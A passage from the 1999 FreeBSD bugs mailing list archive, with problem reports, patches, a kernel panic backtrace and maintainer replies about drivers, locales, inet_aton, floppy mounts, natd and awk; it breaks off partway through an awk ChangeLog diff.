Response time continually slows on idle machine, PIII processors on version 3.2 Date: Tue, 7 Sep 1999 12:38:40 -0700 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2448.0) Content-Type: text/plain Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org After looking into this problem I find that tit is quite different then it originally appeared to be. It appears that the Ethernet connection response slows in a shorter time then the console login. So I changed out the SMC 83c170 Ethernet board that uses the tx0 driver with an Intel Ethernet board that uses the fxp0 driver. I ran a test over the three day weekend and the problem appears to have disappeared. I'll confer back on this latter after we have more cook time on it. In the mean time it appears that the problem Synopsys needs to be changed to : SMC 83C170 Ethernet controller using tx driver slows and stops machine after days of Ethernet traffic. Thanks, Russ Russell.Ingram@sandiegoca.ncr.com or rfi@home.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Sep 7 13:30:24 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 18AE614F23 for ; Tue, 7 Sep 1999 13:30:22 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA15154; Tue, 7 Sep 1999 13:30:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id E960B14F23; Tue, 7 Sep 1999 13:22:01 -0700 (PDT) Message-Id: <19990907202201.E960B14F23@hub.freebsd.org> Date: Tue, 7 Sep 1999 13:22:01 -0700 (PDT) From: jtjang@gcn.net.tw To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: bin/13623: libxpg4.so.2.0 doesn't support zh_TW.Big5 locale Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 13623 >Category: bin >Synopsis: libxpg4.so.2.0 doesn't support zh_TW.Big5 locale >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Sep 7 13:30:01 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Keith Jang >Release: 4.0-current >Organization: Private >Environment: FreeBSD phantom.at.home 4.0-CURRENT FreeBSD 4.0-CURRENT #0: Wed Sep 8 00:45:24 GMT 1999 root@phantom.at.home:/usr/src/sys/compile/phantom i386 >Description: /usr/src/lib/compat/compat22/libxpg4.so.2.0.gz.uu does not have BIG5 rune supported. aout applications like Netscape needs this to function properly. >How-To-Repeat: Just uudecode & gunzip libxpg4.so.2.0.gz.uu, and "nm -aout libxpg4.so.2.0 |grep -i big5" will show that no BIG5-related symbols there, while elf libxpg4 contains those symbols. >Fix: A working aout libxpg4 can be fetched from ftp://freebsd.sinica.edu.tw/pub/keith/libxpg4.so.2.0. To compile it yourself, follow these steps (clean /usr/obj first): cd /usr/src/lib/csu/i386 env OBJFORMAT=aout make cp *.o /usr/src/lib/libxpg4 cd /usr/src/lib/libxpg4 env OBJFORMAT=aout make Since zh_TW.Big5 locale was introduced in 3.0R, I suggest that the broken one in compat22 be nuked, and put a working libxpg4 in compat3x. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Sep 7 16: 0:30 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 04AD015403 for ; Tue, 7 Sep 1999 16:00:25 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id QAA26606; Tue, 7 Sep 1999 16:00:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from esmeralda.xaa.iae.nl (esmeralda.xaa.iae.nl [194.151.75.9]) by hub.freebsd.org (Postfix) with ESMTP id 1948514EE2 for ; Tue, 7 Sep 1999 15:57:32 -0700 (PDT) (envelope-from xaa@xaa.iae.nl) Received: from ariel.xaa.iae.nl (ariel.xaa.iae.nl [194.151.75.10]) by esmeralda.xaa.iae.nl (Postfix) with ESMTP id 964B6BA1C for ; Wed, 8 Sep 1999 00:55:46 +0200 (MET DST) Received: by ariel.xaa.iae.nl (Postfix, from userid 1002) id 0895F1F4F; Wed, 8 Sep 1999 00:55:45 +0200 (CEST) Message-Id: <19990907225545.0895F1F4F@ariel.xaa.iae.nl> Date: Wed, 8 Sep 1999 00:55:45 +0200 (CEST) From: xaa@xaa.iae.nl Reply-To: xaa@xaa.iae.nl To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: bin/13628: inet_aton accepts too much Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 13628 >Category: bin >Synopsis: inet_aton doesn't check valid addresses well enough >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Sep 7 16:00:02 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Mark Huizer >Release: FreeBSD 4.0-CURRENT i386 >Organization: >Environment: 4.0-current >Description: inet_aton should return 0 on invalid IP addresses. 1000.0.0.0 is an invalid address but inet_aton will kindly return 1000*(1<<24) and 1 for a successful translation >How-To-Repeat: if (!inet_aton("1000.0.0.0",&sockaddress)) { fprintf(stderr,"invalid address\n"); } else fprintf(stderr,"valid address??\n"); >Fix: check the parts more carefully. haven't checked linux' code yet, but that correctly returns a 0 for invalid addresses >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Sep 7 19:11: 2 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id A029114CBB for ; Tue, 7 Sep 1999 19:10:55 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id TAA61683; Tue, 7 Sep 1999 19:10:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 4ECB014F2D; Tue, 7 Sep 1999 19:03:24 -0700 (PDT) Message-Id: <19990908020324.4ECB014F2D@hub.freebsd.org> Date: Tue, 7 Sep 1999 19:03:24 -0700 (PDT) From: james-hunsaker@uiowa.edu To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: kern/13630: system halts after npx0 detected on 3.2 install Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 13630 >Category: kern >Synopsis: system halts after npx0 detected on 3.2 install >Confidential: no >Severity: serious >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Sep 7 19:10:01 PDT 1999 >Closed-Date: >Last-Modified: >Originator: James A Hunsaker IV >Release: 3.2 Install >Organization: >Environment: Can't boot, however running a Celeron 400Mhz on an Intel CA810 motherboard which uses the 810 Chipset (shares video ram with main ram). The system has 128MB ram and runs fine with other OSes. >Description: System halts on install after npx0 on motherboard npx0: INT 16 interface is displayed. Have tried setting flag 7, but still halts. Have tried setting flag 1, but still halts. Have tried disabling npx0, but halts after vga0. >How-To-Repeat: >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Sep 7 22:41:53 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 411041514B for ; Tue, 7 Sep 1999 22:41:52 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id WAA82431; Tue, 7 Sep 1999 22:40:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from mercury.is.co.za (mercury.is.co.za [196.4.160.222]) by hub.freebsd.org (Postfix) with ESMTP id AF1F415047 for ; Tue, 7 Sep 1999 22:38:10 -0700 (PDT) (envelope-from conradj@tom-jones.is.co.za) Received: from admin.is.co.za (admin.is.co.za [196.23.0.9]) by mercury.is.co.za (8.9.3/8.9.3) with ESMTP id HAA02401 for ; Wed, 8 Sep 1999 07:36:17 +0200 Received: from tom-jones.is.co.za (tom-jones.is.co.za [196.23.0.193]) by admin.is.co.za (8.8.6/8.7.3/ISsubsidiary#1) with SMTP id HAA26692 for ; Wed, 8 Sep 1999 07:36:16 +0200 (GMT) Received: (qmail 3924 invoked by uid 1001); 8 Sep 1999 07:36:33 -0000 Message-Id: <19990908073633.3923.qmail@tom-jones.is.co.za> Date: 8 Sep 1999 07:36:33 -0000 From: conradj@is.co.za Reply-To: conradj@is.co.za To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: kern/13632: Floppy hangs system Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 13632 >Category: kern >Synopsis: Floppy hangs system >Confidential: yes >Severity: serious >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Sep 7 22:40:00 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Conrad Juleff >Release: FreeBSD 3.2-RELEASE i386 >Organization: The Internet Solution >Environment: Standard i386 Pentium 133 server with UW-SCSI and standard 1.44M floppy drive. >Description: If I mount an msdos floppy read-write when the disk has write protection turned on it hangs the system. This sometimes happens if I access the disk and everytime I try to copy to it. I am not aware of this being fixed in -stable. Sep 7 10:15:51 x /kernel: fd0c: hard error writing fsbn 19 (ST0 40 ST1 +2 ST2 0 cyl 0 hd 1 sec 2) >How-To-Repeat: mount -t msdos /dev/fd0 /mnt and then attempt to write to the disk. >Fix: mount -r -t msdos /dev/fd0 /mnt >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Sep 7 23: 9: 0 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 0D9E115B2C; Tue, 7 Sep 1999 23:08:58 -0700 (PDT) (envelope-from ken@FreeBSD.org) Received: (from ken@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id XAA84417; Tue, 7 Sep 1999 23:08:14 -0700 (PDT) (envelope-from ken@FreeBSD.org) Date: Tue, 7 Sep 1999 23:08:14 -0700 (PDT) From: Message-Id: <199909080608.XAA84417@freefall.freebsd.org> To: ken@FreeBSD.org, freebsd-bugs@FreeBSD.org, gibbs@FreeBSD.org Subject: Re: kern/13612: "Timedout SCB handled by another timeout" on dual processor Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: "Timedout SCB handled by another timeout" on dual processor Responsible-Changed-From-To: freebsd-bugs->gibbs Responsible-Changed-By: ken Responsible-Changed-When: Tue Sep 7 23:07:58 PDT 1999 Responsible-Changed-Why: Justin's driver. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Sep 8 4:40:47 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 10B0414FEE for ; Wed, 8 Sep 1999 04:40:39 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id EAA13989; Wed, 8 Sep 1999 04:40:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Date: Wed, 8 Sep 1999 04:40:03 -0700 (PDT) Message-Id: <199909081140.EAA13989@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Sheldon Hearn Subject: Re: kern/13632: Floppy hangs system Reply-To: Sheldon Hearn Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/13632; it has been noted by GNATS. From: Sheldon Hearn To: conradj@is.co.za Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: kern/13632: Floppy hangs system Date: Wed, 08 Sep 1999 13:30:02 +0200 On 08 Sep 1999 07:36:33 GMT, conradj@is.co.za wrote: > If I mount an msdos floppy read-write when the disk has write protection > turned on it hangs the system. This sometimes happens if I access the disk > and everytime I try to copy to it. I am not aware of this being fixed in > -stable. The results are different under STABLE. Writing to a floppy mounted read-only fails as expected, but a subsequent umount attempt panics the box: fd0c: hard error writing fsbn 5 of 5-12 (ST0 40 ST1 2 ST2 0 cyl 0 hd 0 sec 6) [several of these messages repeated] panic: vinvalbuf: dirty bufs Ciao, sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Sep 8 5: 1:52 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id E4D9C14E93 for ; Wed, 8 Sep 1999 05:01:46 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id FAA15127; Wed, 8 Sep 1999 05:00:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 85ED214D07; Wed, 8 Sep 1999 04:58:04 -0700 (PDT) Message-Id: <19990908115804.85ED214D07@hub.freebsd.org> Date: Wed, 8 Sep 1999 04:58:04 -0700 (PDT) From: david@inty.net To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: bin/13639: incorrect handling of TCP reset connection in libalias Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 13639 >Category: bin >Synopsis: incorrect handling of TCP reset connection in libalias >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Sep 8 05:00:01 PDT 1999 >Closed-Date: >Last-Modified: >Originator: David Hedley >Release: 3.2 >Organization: INTY >Environment: FreeBSD server.inty.net 3.2-RELEASE FreeBSD 3.2-RELEASE #1: Thu Jul 22 15:18:40 BST 1999 david@server.inty.net:/usr/src/sys/compile/GENERIC+MODS i386 >Description: If an incoming connection is initiated through natd and deny_incoming is not set, then a new alias_link structure is created to handle the link. If there is nothing listening for the incoming connection, then the kernel responds with a RST for the connection. However, this is not processed correctly in libalias/alias.c:TcpMonitor{In,Out} and libalias/alias_db.c:SetState{In,Out} as it thinks a connection has been established and therefore applies a timeout of 86400 seconds to the link. If many of these half-connections are initiated (during, for example, a port scan of the host), then many thousands of unnecessary links are created and the resident size of natd balloons to 20MB or more. >How-To-Repeat: Run natd without deny_incoming. Run a TCP port scanner against the machine. >Fix: The following patch will tell libalias to realise that a connection hasn't, in fact, been completed and thus will give the newly created link a timeout of TCP_EXPIRE_DEAD: *** /usr/src/lib/libalias/alias.c Wed Mar 24 17:12:00 1999 --- libalias/alias.c Wed Jul 28 10:58:32 1999 *************** *** 139,144 **** --- 139,148 ---- case ALIAS_TCP_STATE_NOT_CONNECTED: if (tc->th_flags & TH_SYN) SetStateIn(link, ALIAS_TCP_STATE_CONNECTED); + if (tc->th_flags & TH_RST) { + SetStateIn(link, ALIAS_TCP_STATE_DISCONNECTED); + SetStateOut(link, ALIAS_TCP_STATE_DISCONNECTED); + } break; case ALIAS_TCP_STATE_CONNECTED: if (tc->th_flags & TH_FIN *************** *** 160,165 **** --- 164,173 ---- case ALIAS_TCP_STATE_NOT_CONNECTED: if (tc->th_flags & TH_SYN) SetStateOut(link, ALIAS_TCP_STATE_CONNECTED); + if (tc->th_flags & TH_RST) { + SetStateIn(link, ALIAS_TCP_STATE_DISCONNECTED); + SetStateOut(link, ALIAS_TCP_STATE_DISCONNECTED); + } break; case ALIAS_TCP_STATE_CONNECTED: if (tc->th_flags & TH_FIN >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Sep 8 6: 1:18 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id B501014D43 for ; Wed, 8 Sep 1999 06:01:16 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA19176; Wed, 8 Sep 1999 06:00:04 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Date: Wed, 8 Sep 1999 06:00:04 -0700 (PDT) Message-Id: <199909081300.GAA19176@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Sheldon Hearn Subject: Re: kern/13632: Floppy hangs system Reply-To: Sheldon Hearn Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/13632; it has been noted by GNATS. From: Sheldon Hearn To: freebsd-gnats-submit@freebsd.org Cc: Subject: Re: kern/13632: Floppy hangs system Date: Wed, 08 Sep 1999 14:57:57 +0200 Following up on myself, here's a back trace of the panic I mentioned. I have the crash dump available if anyone has things they;d like me to look at. Ciao, Sheldon. #9 0xc012f710 in panic (fmt=0xc01fa7f4 "vinvalbuf: dirty bufs") at ../../kern/kern_shutdown.c:444 #10 0xc0151504 in vinvalbuf (vp=0xc4c4af00, flags=1, cred=0x0, p=0xc4bf0440, slpflag=0, slptimeo=0) at ../../kern/vfs_subr.c:599 #11 0xc015e034 in spec_close (ap=0xc4c4eec0) at ../../miscfs/specfs/spec_vnops.c:648 #12 0xc01a938e in ufsspec_close (ap=0xc4c4eec0) at ../../ufs/ufs/ufs_vnops.c:1872 #13 0xc01a9861 in ufs_vnoperatespec (ap=0xc4c4eec0) at ../../ufs/ufs/ufs_vnops.c:2317 #14 0xc0162d9c in msdosfs_unmount (mp=0xc09cbc00, mntflags=0, p=0xc4bf0440) at vnode_if.h:191 #15 0xc0153fd4 in dounmount (mp=0xc09cbc00, flags=0, p=0xc4bf0440) at ../../kern/vfs_syscalls.c:488 #16 0xc0153f14 in unmount (p=0xc4bf0440, uap=0xc4c4ef94) at ../../kern/vfs_syscalls.c:456 #17 0xc01d2627 in syscall (frame={tf_es = 39, tf_ds = 39, tf_edi = 134631479, tf_esi = 134694461, tf_ebp = -1077945316, tf_isp = -993726492, tf_ebx = -1077946452, tf_edx = 0, tf_ecx = 3, tf_eax = 22, tf_trapno = 12, tf_err = 2, tf_eip = 134518920, tf_cs = 31, tf_eflags = 582, tf_esp = -1077946512, tf_ss = 39}) at ../../i386/i386/trap.c:1100 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Sep 8 6:21:44 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from axl.noc.iafrica.com (axl.noc.iafrica.com [196.31.1.175]) by hub.freebsd.org (Postfix) with ESMTP id CB36414CC5 for ; Wed, 8 Sep 1999 06:21:36 -0700 (PDT) (envelope-from sheldonh@axl.noc.iafrica.com) Received: from sheldonh (helo=axl.noc.iafrica.com) by axl.noc.iafrica.com with local-esmtp (Exim 3.02 #1) id 11Ohdw-000GBq-00; Wed, 08 Sep 1999 15:20:08 +0200 From: Sheldon Hearn To: Bruce Evans Cc: freebsd-bugs@freebsd.org Subject: Re: kern/13632: Floppy hangs system In-reply-to: Your message of "Wed, 08 Sep 1999 22:39:07 +1000." Date: Wed, 08 Sep 1999 15:20:08 +0200 Message-ID: <62237.936796808@axl.noc.iafrica.com> Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi Bruce, Is it impractical to teach mount to detect read-only media and automatically "set -o ro" for them? Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Sep 8 6:27: 7 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 06A4314ECC; Wed, 8 Sep 1999 06:27:05 -0700 (PDT) (envelope-from sheldonh@FreeBSD.org) Received: (from sheldonh@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA22793; Wed, 8 Sep 1999 06:25:26 -0700 (PDT) (envelope-from sheldonh@FreeBSD.org) Date: Wed, 8 Sep 1999 06:25:26 -0700 (PDT) From: Message-Id: <199909081325.GAA22793@freefall.freebsd.org> To: sheldonh@FreeBSD.org, freebsd-bugs@FreeBSD.org, ru@FreeBSD.org Subject: Re: bin/13639: incorrect handling of TCP reset connection in libalias Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: incorrect handling of TCP reset connection in libalias Responsible-Changed-From-To: freebsd-bugs->ru Responsible-Changed-By: sheldonh Responsible-Changed-When: Wed Sep 8 06:25:00 PDT 1999 Responsible-Changed-Why: Over to the natd maintainer. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Sep 8 7: 3:32 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8D17415278; Wed, 8 Sep 1999 07:03:31 -0700 (PDT) (envelope-from sheldonh@FreeBSD.org) Received: (from sheldonh@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA76478; Wed, 8 Sep 1999 07:03:09 -0700 (PDT) (envelope-from sheldonh@FreeBSD.org) Date: Wed, 8 Sep 1999 07:03:09 -0700 (PDT) From: Message-Id: <199909081403.HAA76478@freefall.freebsd.org> To: sheldonh@FreeBSD.org, freebsd-bugs@FreeBSD.org, sheldonh@FreeBSD.org Subject: Re: bin/13070: line(1) as required by Unix 98 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: line(1) as required by Unix 98 Responsible-Changed-From-To: freebsd-bugs->sheldonh Responsible-Changed-By: sheldonh Responsible-Changed-When: Wed Sep 8 07:02:18 PDT 1999 Responsible-Changed-Why: James and I are discussing PR 13070, PR 13071 and PR 13074, which are all related. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Sep 8 7: 9: 6 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id E05CE14D60; Wed, 8 Sep 1999 07:09:03 -0700 (PDT) (envelope-from sheldonh@FreeBSD.org) Received: (from sheldonh@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA76975; Wed, 8 Sep 1999 07:07:22 -0700 (PDT) (envelope-from sheldonh@FreeBSD.org) Date: Wed, 8 Sep 1999 07:07:22 -0700 (PDT) From: Message-Id: <199909081407.HAA76975@freefall.freebsd.org> To: sheldonh@FreeBSD.org, freebsd-bugs@FreeBSD.org, sheldonh@FreeBSD.org Subject: Re: bin/13071: link(1) as required by Unix 98 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: link(1) as required by Unix 98 Responsible-Changed-From-To: freebsd-bugs->sheldonh Responsible-Changed-By: sheldonh Responsible-Changed-When: Wed Sep 8 07:07:01 PDT 1999 Responsible-Changed-Why: James and I are discussing PR 13070, PR 13071 and PR 13074, which are all related. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Sep 8 7: 9: 6 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2259714D62; Wed, 8 Sep 1999 07:09:04 -0700 (PDT) (envelope-from sheldonh@FreeBSD.org) Received: (from sheldonh@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA77052; Wed, 8 Sep 1999 07:07:37 -0700 (PDT) (envelope-from sheldonh@FreeBSD.org) Date: Wed, 8 Sep 1999 07:07:37 -0700 (PDT) From: Message-Id: <199909081407.HAA77052@freefall.freebsd.org> To: sheldonh@FreeBSD.org, freebsd-bugs@FreeBSD.org, sheldonh@FreeBSD.org Subject: Re: bin/13074: unlink(1) as required by Unix 98 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: unlink(1) as required by Unix 98 Responsible-Changed-From-To: freebsd-bugs->sheldonh Responsible-Changed-By: sheldonh Responsible-Changed-When: Wed Sep 8 07:07:25 PDT 1999 Responsible-Changed-Why: James and I are discussing PR 13070, PR 13071 and PR 13074, which are all related. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Sep 8 8: 5:55 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 465A515059; Wed, 8 Sep 1999 08:05:54 -0700 (PDT) (envelope-from peter@FreeBSD.org) Received: (from peter@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA82484; Wed, 8 Sep 1999 08:05:28 -0700 (PDT) (envelope-from peter@FreeBSD.org) Date: Wed, 8 Sep 1999 08:05:28 -0700 (PDT) From: Message-Id: <199909081505.IAA82484@freefall.freebsd.org> To: ap@bnc.net, peter@FreeBSD.org, gnats-admin@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: pending/13637: ../../pci/if_xl.c:133: miibus_if. is missing/not being generated by config Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: ../../pci/if_xl.c:133: miibus_if. is missing/not being generated by config State-Changed-From-To: open->closed State-Changed-By: peter State-Changed-When: Wed Sep 8 08:03:58 PDT 1999 State-Changed-Why: Not a bug - pilot error. Add "controller miibus0" to your config. See GENERIC for an example. Responsible-Changed-From-To: gnats-admin->freebsd-bugs Responsible-Changed-By: peter Responsible-Changed-When: Wed Sep 8 08:03:58 PDT 1999 Responsible-Changed-Why: refile. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Sep 8 9:51:54 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id A3E9014FA9 for ; Wed, 8 Sep 1999 09:51:14 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA94051; Wed, 8 Sep 1999 09:50:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Date: Wed, 8 Sep 1999 09:50:02 -0700 (PDT) Message-Id: <199909081650.JAA94051@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Sheldon Hearn Subject: Re: bin/13615: awk bug Reply-To: Sheldon Hearn Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR bin/13615; it has been noted by GNATS. From: Sheldon Hearn To: Scott Hazen Mueller Cc: jraynard@freebsd.org, freebsd-gnats-submit@freebsd.org Subject: Re: bin/13615: awk bug Date: Wed, 08 Sep 1999 18:44:27 +0200 On Wed, 08 Sep 1999 11:30:46 +0200, Sheldon Hearn wrote: > I'll see what happens with 3.0.4 (not just one diff) and if it's still a > problem, I'll contact the maintainer. Hmmm. I upgraded my src/contrib/awk to 3.0.4 and the problem seems to be fixed in that version. You can use the diffs below for now, but I suspect James will want to do a proper vendor merge. Thanks for the useful How-To-Repeat, by the way! :-) Ciao, Sheldon. Index: ChangeLog =================================================================== RCS file: /home/ncvs/src/contrib/awk/ChangeLog,v retrieving revision 1.1.1.1 diff -u -d -r1.1.1.1 ChangeLog --- ChangeLog 1997/10/14 18:16:57 1.1.1.1 +++ ChangeLog 1999/09/08 16:32:51 @@ -1,3 +1,304 @@ +Wed Jun 30 16:14:36 1999 Arnold D. Robbins + + * Release 3.0.4: Release tar file made. This time for sure. + +Wed Jun 30 16:10:11 1999 Arnold D. Robbins + + * awk.h: add include of , and comment about config.h + having to be included before any system headers. Otherwise, + with egcs-2.91.66 and later on Linux systems, and possibly + others, things break badly, due to the LFS macros. + * awk.y, builtin.c, eval.c, field.c, io.c: removed include + of assert.h + +Wed Jun 9 11:39:19 1999 Paul Eggert + + Port the large-file code to AIX, HP-UX, and IRIX. + Add cross-compilation support for large files. + + * config.guess, config.sub: New files. + + * configure.in (AC_CANONICAL_HOST): + Add; 